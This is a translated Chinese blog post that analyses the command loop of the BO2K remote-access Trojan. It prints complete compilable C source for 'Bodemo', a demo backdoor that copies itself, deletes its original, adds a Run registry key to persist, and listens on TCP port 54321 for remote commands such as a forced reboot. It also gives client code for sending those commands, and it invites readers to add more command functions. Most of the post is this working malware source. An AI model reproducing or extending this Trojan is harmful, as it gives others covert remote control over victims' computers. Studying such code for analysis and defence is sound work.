BO2K Source Analysis (2) ---- Command Loop Mechanism

zhaozj  2021-02-08

The BO2K server command loop is the core of how the BO2K server Trojan works. The server first builds a copy of itself, starts that copy with its own full path as a parameter, and then exits. When the copy runs it first deletes the original program (the file to delete is taken from the parameter it was passed), then checks the registry; if it is not yet registered, it registers the copy to be started when the system starts. At that point the Trojan installation is complete. The copy then initializes the command array, sets up the listening port, and enters the command loop (all of this is the work of the EntryPoint() function). This installment covers the command loop mechanism.

Note 1: The Bodemo in this installment has a complete Trojan implementation and a complete command loop, but only two commands, No. 0 and No. 1, are implemented. I think that is enough to demonstrate the command loop. Command No. 0 restarts the server machine (already a prototype of hacking behaviour), and command No. 1 pops up a MessageBox on the server machine.

Note 2: Bodemo compiles easily with any Windows C compiler and needs no special settings, but note that it must be linked against WSOCK32.LIB. If you create an empty Win32 application with VC, you can paste the code below into it. Compiled with LCC, the result is only about 10K.

Note 3: The error-checking code has been removed from this Bodemo, so it differs considerably from a practical version. It is offered for reference only; I hope readers will build on this foundation to develop Chinese software. If there is any problem, mail to: saiwai76@263.net

Now to the main topic. EntryPoint() executes as follows:

1. Initialize the command array (command_handler_table): allocate memory to hold the commands, by default up to 1024 of them, and initialize every entry to NULL. Each command has this structure: a command ID number, a function pointer, and several parameters. So BO's basic operation is: listen on a port, receive a packet from the client, extract the command ID and parameters from the packet, look up the function pointer in the command array by that ID and call it, then return the result to the client. That is the basic picture. The real BO2K also supports both UDP and TCP, as well as packet encryption, so it is considerably more complex than this process; I will cover that in the next installment, on BO's network principles.

2. Register the commands (RegisterNativeCommands()): this step sets up the listening socket (in InitializeCommands(), which calls RegisterNativeCommands()) and registers the command functions into the command array. Bodemo registers only two command functions, purely for demonstration; interested readers can write some command functions themselves.

3. Enter the command loop (CommandHandlerLoop()): this step listens for the client's control commands and dispatches them. In Bodemo, a command of 0 runs command No. 0 (restart) and a command of 1 runs command No. 1 (an empty MessageBox()). Note that this code adjusts the process priority dynamically while it runs, which bears a remarkable resemblance to MFC's CWinThread::Run().
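The dispatch mechanism the three steps above describe, as an added portable example that is not part of the page's or BO2K's code: a 1024-slot handler table, registration into slots 0 and 1, and the per-packet dispatch, with the two checks the demo leaves out (packet length and unregistered ID). The names `register_command`, `make_packet`, `dispatch_packet` and the two handlers are this example's own; the handlers are benign stand-ins that only record which slot ran.

```c
#include <stdio.h>
#include <string.h>
#include <stdint.h>

/* Same shape as the demo's table: up to 1024 slots, each a handler pointer or NULL. */
#define MAX_BO_COMMANDS 1024
typedef int (*cmd_handler)(int comid, uint32_t nArg1, const char *svArg2, const char *svArg3);
static cmd_handler command_handler_table[MAX_BO_COMMANDS]; /* static storage: starts all NULL */

/* Benign stand-ins for the demo's two handlers (hypothetical): they only record which slot ran. */
static int g_last_ran = -1;
static int handler_slot0(int c, uint32_t a1, const char *a2, const char *a3) { g_last_ran = 0; return 0; }
static int handler_slot1(int c, uint32_t a1, const char *a2, const char *a3) { g_last_ran = 1; return 0; }
int last_ran(void) { return g_last_ran; }

/* RegisterNativeCommands() equivalent, with the bounds check the demo does not have. */
int register_command(int id, cmd_handler h) {
    if (id < 0 || id >= MAX_BO_COMMANDS || h == NULL) return -1;
    command_handler_table[id] = h;
    return 0;
}

/* Build the packet the demo's client sends: 10 host-order ints, p[0] = command ID. */
void make_packet(int32_t id, unsigned char out[40]) {
    memset(out, 0, 40);
    memcpy(out, &id, sizeof id);
}

/* One pass of the command loop for a received packet. The demo reads command = p[0]
   straight from the buffer; here a packet shorter than one int is dropped (-2), and an
   out-of-range or unregistered ID returns -1 instead of calling through a NULL pointer. */
int dispatch_packet(const unsigned char *pkt, size_t len) {
    int32_t command;
    if (len < sizeof command) return -2;
    memcpy(&command, pkt, sizeof command);               /* p[0], without an unaligned cast */
    if (command < 0 || command >= MAX_BO_COMMANDS) return -1;
    if (command_handler_table[command] == NULL) return -1;
    return command_handler_table[command](0, 0, "", "");  /* the loop passes empty args */
}

int main(void) {
    unsigned char pkt[40];                               /* constructed sample packets */
    register_command(0, handler_slot0);
    register_command(1, handler_slot1);
    make_packet(1, pkt);
    int r = dispatch_packet(pkt, sizeof pkt);
    printf("ID 1  -> %d, slot %d ran\n", r, last_ran());
    make_packet(77, pkt);
    printf("ID 77 -> %d (no handler)\n", dispatch_packet(pkt, sizeof pkt));
    printf("2-byte packet -> %d (dropped)\n", dispatch_packet(pkt, 2));
    return 0;
}
```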

To send a command to Bodemo from the client side:

```c
SOCKET ss;
ss = socket(AF_INET, SOCK_STREAM, 0);
struct sockaddr_in sa;
memset(&sa, 0, sizeof(struct sockaddr_in));
sa.sin_family = AF_INET;
sa.sin_port = htons(54321);
sa.sin_addr.S_un.S_addr = inet_addr("xxx.xxx.xxx.xxx"); /* server's IP address */
int ret = connect(ss, (const struct sockaddr *)&sa, sizeof(struct sockaddr_in));
if (SOCKET_ERROR == ret) {
    closesocket(ss);
    return;
}
int boPacket[10];
boPacket[0] = 1; /* command ID, 0 or 1 */
send(ss, (char *)boPacket, sizeof(int) * 10, MSG_OOB);
```

Attached is the Bodemo source:

```c
#include <windows.h>   // the header names were lost in the page's extraction; these are
#include <winsock.h>   // the two the code needs (Win32 API, and Winsock 1.1 via WSOCK32.LIB)
#include <stdlib.h>    // malloc / free

/**************************************************************/
BOOL g_bIsWinNT;
/**************************************************************/
void GetOSVersion(void);
int InitializeCommandDispatcher(void);
void InitializeCommands(void);
void TerminateCommands(void);
int KillCommandDispatcher(void);
void CommandHandlerLoop(void);

DWORD WINAPI EntryPoint(LPVOID lpParameter)
{
    InitializeCommandDispatcher();  // alloc memory for command_handler_table and
                                    // command_description_table, initialize them as NULL
    // Initialize commands
    InitializeCommands();

    // Do primary command loop
    CommandHandlerLoop();

    // Kill plugins
    TerminateCommands();

    // Kill command dispatcher: delete command_table memory
    KillCommandDispatcher();

    return 0;
}

int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
    GetOSVersion();

    int nInstall = 0;
    char *svRunRegKey;
    svRunRegKey = "Software\\Microsoft\\Windows\\CurrentVersion\\Run";

    // Check for file to delete.
    // When BO2K runs, it starts its copy with its own full path name as the parameter,
    // and the copy deletes the original according to that parameter.
    // This code only gets to run once.
    char *svCmdLine = GetCommandLine();
    while (svCmdLine[0] != '\0') {
        svCmdLine++;
        if (*(svCmdLine - 1) == ' ') break;
    }
    if (svCmdLine[0] != '\0') {   // found the file to be deleted: delete it
        while (DeleteFile(svCmdLine) == 0) {
            if (GetLastError() == ERROR_FILE_NOT_FOUND) break;
            Sleep(100);
        }
    }

    // Get current module location
    char svFileName[512];
    char svTargetName[MAX_PATH];
    GetModuleFileName(GetModuleHandle(NULL), svFileName, 512);
    lstrcpy(svTargetName, "C:\\Bodemo.exe");

    // ----- 1: Check for installation -----
    if (GetFileAttributes(svTargetName) != 0xFFFFFFFF) nInstall = 1;

    if (nInstall == 0) {   // BO not yet installed: this only happens on the first run
        // Make copy of file
        while (CopyFile(svFileName, svTargetName, FALSE) == 0) Sleep(1000);

        // Set startup key: this is how BO registers itself to start with the system
        HKEY key;
        if (g_bIsWinNT) {
            if (RegOpenKey(HKEY_CURRENT_USER, svRunRegKey, &key) == ERROR_SUCCESS) {
                RegSetValueEx(key, "Bodemo", 0, REG_SZ, (BYTE *)svTargetName, lstrlen(svTargetName));
                RegCloseKey(key);
            }
        } else {
            if (RegOpenKey(HKEY_LOCAL_MACHINE, svRunRegKey, &key) == ERROR_SUCCESS) {
                RegSetValueEx(key, "Bodemo", 0, REG_SZ, (BYTE *)svTargetName, lstrlen(svTargetName));
                RegCloseKey(key);
            }
        }

        // And now run the copy. Note: the copy is started with this program's own
        // full path name as its parameter.
        STARTUPINFO si;
        PROCESS_INFORMATION pi;
        char svComLine[2048];
        lstrcpyn(svComLine, svTargetName, 2048);
        lstrcpyn(svComLine + lstrlen(svComLine), " ", 2048 - lstrlen(svComLine));
        lstrcpyn(svComLine + lstrlen(svComLine), svFileName, 2048 - lstrlen(svComLine));
        memset(&si, 0, sizeof(STARTUPINFO));
        si.cb = sizeof(STARTUPINFO);
        si.dwFlags = STARTF_FORCEOFFFEEDBACK;
        CreateProcess(NULL, svComLine, NULL, NULL, 0, 0, NULL, NULL, &si, &pi);
    } else {   // BO already installed: every run except the first takes this path
        // Enable permissions on Windows NT: adjust the privileges needed to restart the machine
        if (g_bIsWinNT) {
            HANDLE tok;
            if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &tok)) {
                LUID luid;
                TOKEN_PRIVILEGES tp;
                LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME, &luid);
                tp.PrivilegeCount = 1;
                tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
                tp.Privileges[0].Luid = luid;
                AdjustTokenPrivileges(tok, FALSE, &tp, 0, NULL, NULL);
                LookupPrivilegeValue(NULL, SE_SECURITY_NAME, &luid);
                tp.PrivilegeCount = 1;
                tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
                tp.Privileges[0].Luid = luid;
                AdjustTokenPrivileges(tok, FALSE, &tp, 0, NULL, NULL);
                CloseHandle(tok);
            }
        }
        // Enter the command loop
        EntryPoint(GetModuleHandle(NULL));
    }
    return 0;
}

// Determine operating system version
void GetOSVersion(void)
{
    OSVERSIONINFO osvi;

    osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
    if (GetVersionEx(&osvi) == FALSE) {
        MessageBox(HWND_DESKTOP, "Unable to get version info", "GetOSVersion()", MB_OK);
    }

    if (osvi.dwPlatformId == VER_PLATFORM_WIN32s) {
        MessageBox(HWND_DESKTOP, "This application does not run under WIN32s!", "Error", MB_OK);
    }
    if (osvi.dwPlatformId == VER_PLATFORM_WIN32_NT) g_bIsWinNT = 1;
    else g_bIsWinNT = 0;
}

/************ BO command processing: the focus of this installment *****/
#define MAX_BO_COMMANDS 1024
typedef int (*BO_CMD_HANDLER)(SOCKET s, int comid, DWORD nArg1, char *svArg2, char *svArg3);
typedef struct {
    BOOL bNativeComm;
    char *svFolderName;
    char *svCommName;
    char *svArgDesc1;
    char *svArgDesc2;
    char *svArgDesc3;
} BO_CMD_DESC;

BO_CMD_HANDLER *command_handler_table = NULL;
BO_CMD_DESC *command_description_table = NULL;

HANDLE g_hDispatchMutex = NULL;

int InitializeCommandDispatcher(void)
{
    int i;

    command_handler_table = (BO_CMD_HANDLER *)malloc(sizeof(BO_CMD_HANDLER) * MAX_BO_COMMANDS);
    if (command_handler_table == NULL) return -1;
    command_description_table = (BO_CMD_DESC *)malloc(sizeof(BO_CMD_DESC) * MAX_BO_COMMANDS);
    if (command_description_table == NULL) return -1;
    // The loop body was lost in the page's extraction; restored from the comment in
    // EntryPoint(): every entry starts out NULL.
    for (i = 0; i < MAX_BO_COMMANDS; i++) {
        command_handler_table[i] = NULL;
        memset(&command_description_table[i], 0, sizeof(BO_CMD_DESC));
    }

    return 0;
}

// Not in the page's extraction; the comment in EntryPoint() says it frees the command tables.
int KillCommandDispatcher(void)
{
    free(command_handler_table);
    command_handler_table = NULL;
    free(command_description_table);
    command_description_table = NULL;
    return 0;
}

// static
DWORD WINAPI MbThread(LPVOID parm)
{
    char *svText = (char *)parm;
    char *svMsg, *svTitle;

    svMsg = svText;
    svTitle = svText + lstrlen(svMsg) + 1;

    MessageBox(GetDesktopWindow(), svMsg, svTitle, MB_OK | MB_SETFOREGROUND | MB_SYSTEMMODAL);
    free(parm);

    return 0;
}

int CmdProc_SysMessageBox(SOCKET s, int comid, DWORD nArg1, char *svArg2, char *svArg3)
{
    char *ptr;
    int msglen;
    DWORD tid;

    // The page allocated lstrlen(svArg3) + 2 bytes and then copied svArg2 in after svArg3,
    // overrunning the buffer; both strings plus their two terminators are counted here.
    msglen = lstrlen(svArg2) + lstrlen(svArg3) + 2;
    ptr = (char *)malloc(msglen);
    lstrcpy(ptr, svArg3);
    lstrcpy(ptr + lstrlen(svArg3) + 1, svArg2);
    CreateThread(NULL, 0, MbThread, ptr, 0, &tid);

    return 0;
}

int CmdProc_SysReboot(SOCKET s, int comid, DWORD nArg1, char *svArg2, char *svArg3)
{
    BOOL bRet;
    bRet = ExitWindowsEx(EWX_FORCE | EWX_REBOOT, 0);
    return 0;
}

void RegisterNativeCommands()
{
    // RegisterNativeCommand(BO_SYSREBOOT, CmdProc_SysReboot);
    // RegisterNativeCommand(BO_SYSLOGKEYS, CmdProc_SysLogKeys);
    int command = 0;
    command_handler_table[command] = CmdProc_SysReboot;
    command_description_table[command].svCommName = "";
    command_description_table[command].svFolderName = "";
    command_description_table[command].svArgDesc1 = "";
    command_description_table[command].svArgDesc2 = "";
    command_description_table[command].svArgDesc3 = "";
    command_description_table[command].bNativeComm = TRUE;
    //
    command++;
    command_handler_table[command] = CmdProc_SysMessageBox;
    command_description_table[command].svCommName = "";
    command_description_table[command].svFolderName = "";
    command_description_table[command].svArgDesc1 = "";
    command_description_table[command].svArgDesc2 = "Bodemo";
    command_description_table[command].svArgDesc3 = "You are controlled by me";
    command_description_table[command].bNativeComm = TRUE;
}

//
SOCKET s;

void InitializeCommands(void)
{
    WSADATA wsaData;
    if (WSAStartup(MAKEWORD(1, 1), &wsaData) != 0) return;

    // Register native BO commands
    RegisterNativeCommands();

    struct sockaddr_in sa;
    memset(&sa, 0, sizeof(struct sockaddr_in));
    sa.sin_family = AF_INET;
    sa.sin_port = htons(54321);
    sa.sin_addr.S_un.S_addr = INADDR_ANY;
    if ((s = socket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET) return;
    if (bind(s, (const struct sockaddr *)&sa, sizeof(struct sockaddr_in)) < 0) { /* bind address to socket */
        closesocket(s);
        return;   // the page fell through to listen() on the closed socket
    }
    listen(s, 3);
}

int DispatchCommand(int command, SOCKET s, int comid, int nArg1, char *svArg2, char *svArg3);

void CommandHandlerLoop(void)
{
    BOOL bIdle = FALSE;
    struct sockaddr sa;
    memset(&sa, 0, sizeof(struct sockaddr));
    int len = sizeof(struct sockaddr);
    int command, comid, nArg1;
    char *svArg2, *svArg3;
    char *boPacket;

    while (1) {
        if (!bIdle) {
            SetPriorityClass(GetCurrentProcess(), IDLE_PRIORITY_CLASS);
            SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_IDLE);
            bIdle = TRUE;
        }
        SOCKET acc = accept(s, &sa, &len);
        if (acc == INVALID_SOCKET) continue;
        if (bIdle) {
            SetPriorityClass(GetCurrentProcess(), NORMAL_PRIORITY_CLASS);
            SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_NORMAL);
            bIdle = FALSE;
        }
        unsigned long ll;
        ioctlsocket(acc, FIONREAD, &ll);
        if (ll >= sizeof(int)) {   // the page tested ll > 0 and read p[0] even from a shorter packet
            boPacket = (char *)malloc(ll + 1);
            recv(acc, boPacket, ll, MSG_PEEK);
            int *p = (int *)boPacket;
            command = p[0];
            comid = 0;
            nArg1 = 0;
            svArg2 = "";
            svArg3 = "";
            DispatchCommand(command, acc, comid, nArg1, svArg2, svArg3);
            free(boPacket);
            closesocket(acc);
        } else closesocket(acc);
        Sleep(20);
    }
}

// Not in the page's extraction; written from the text's description: look the handler up
// by ID in command_handler_table and call it, ignoring IDs that have no registered handler.
int DispatchCommand(int command, SOCKET s, int comid, int nArg1, char *svArg2, char *svArg3)
{
    if (command < 0 || command >= MAX_BO_COMMANDS) return -1;
    if (command_handler_table[command] == NULL) return -1;
    return command_handler_table[command](s, comid, nArg1, svArg2, svArg3);
}

void TerminateCommands(void)
{
    closesocket(s);
    WSACleanup();
}
```

When reprinting, please cite the original address: https://www.9cbs.com/read-2497.html
